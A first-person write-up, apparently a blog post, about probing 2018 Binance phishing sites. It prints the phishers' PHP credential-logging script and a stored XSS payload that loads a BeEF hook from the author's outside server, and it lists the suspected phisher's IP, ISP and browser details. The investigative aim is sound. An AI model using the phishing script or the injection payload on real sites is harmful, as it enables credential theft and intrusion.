Back in 2018 Binance had been targeted by a large scale attack by a group of phishers. They made a bounty offer of $250k in BNB to anyone who could provide information leading to their arrest.

In the Medium post they provided a list of known phishing domains for people to investigate.

I went through the list to see which of the sites were still active:

I opened them up in my browser to see if there was anything interesting about how the phisher worked and indeed there was! The form used for logging credentials sent them to a PHP script called rdy.php located at /admm/rdy.php I did some googling and was able to find the source for the phishing script on a Russian hacking forum.

<?php
    $login = $_POST['username'];
    $password= $_POST['password'];
    $email = $login.";".$password;

    if ($login == "" or $password == ""){
    print "<script type=\"text/javascript\">";
    print "alert('Пароль или логин не введен.')";
    print "</script>";
    print '<script>document.location.replace("index.html");</script>';
}
    $file = fopen('acc.txt','a+');
    fwrite($file,"\n\r$email\n\r");
    fclose($file);
print '<script>document.location.replace("http://ya.ru");</script>';
?>

As you can see the script saves the credentials to acc.txt which was accessible on the sites. I visited kykoin.com/admm/ to see what was there and it showed a login panel. Naturally I did what anyone would do when presented with an admin panel and tried to login with admin:admin . That worked. It was a very simple page that showed the contents of acc.txt . I noticed there was no sanitisation of the acc.txt inputs so we could XSS that admin panel.

In order to get some info on who the admin of the panel was I setup a BeEF hook by submitting my payload to the phishing login.

user: notrealuser<script>var commandModuleStr = '<script src="http://myserver.com:3000/hook.js" type="text/javascript"><\/script>';document.write(commandModuleStr);</script> 
pass: randompass

I repeated this for the other phishing sites. Now all we had to do was wait for them to log in.

Next day the same person logged into 3 of the sites.

• waivesplatform.com on 21/03/2018 at 13:51 (GMT +5)
• bittreh.com on 21/03/2018 at 14:05 (GMT +5)
• kykoin.com on 21/03/2018 at 18:12 (GMT +5)

From the BeEF hook we were only able to gather some info as browser exploits are not what they used to be :(

• IP: 83.149.19.150
• ISP: AS31133 PJSC MegaFon / OJSC MSS-Povolzhe Network
• Date: Wed Mar 21 2018 13:51:17 GMT+0500 (RTZ 4 (зима))
• Browser UA (User-agent) String: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 YaBrowser/17.11.1.990 Yowser/2.5 Safari/537.36
• Browser Plugins: BookReader,Chromium PDF Plugin,Chromium PDF Viewer,Native Client,Shockwave Flash,Widevine Content Decryption Module

At this point there wasn’t much more I could do so I sent an email to Binance with all the information I had gathered. Unfortunately Binance never responded so I had no choice but to stop the pursuit. I personally do not believe that Binance had any intention of paying out in this case. In my opinion it appears to have been an attempt at controlling the negativity surrounding the situation. As a result of this I will be hesistant to participate in similar bounties from Binance in the future.

UPDATE September 2021: It appears that some people did receive bounties from this program as I discovered from this twitter exchange I had with @MrGlaive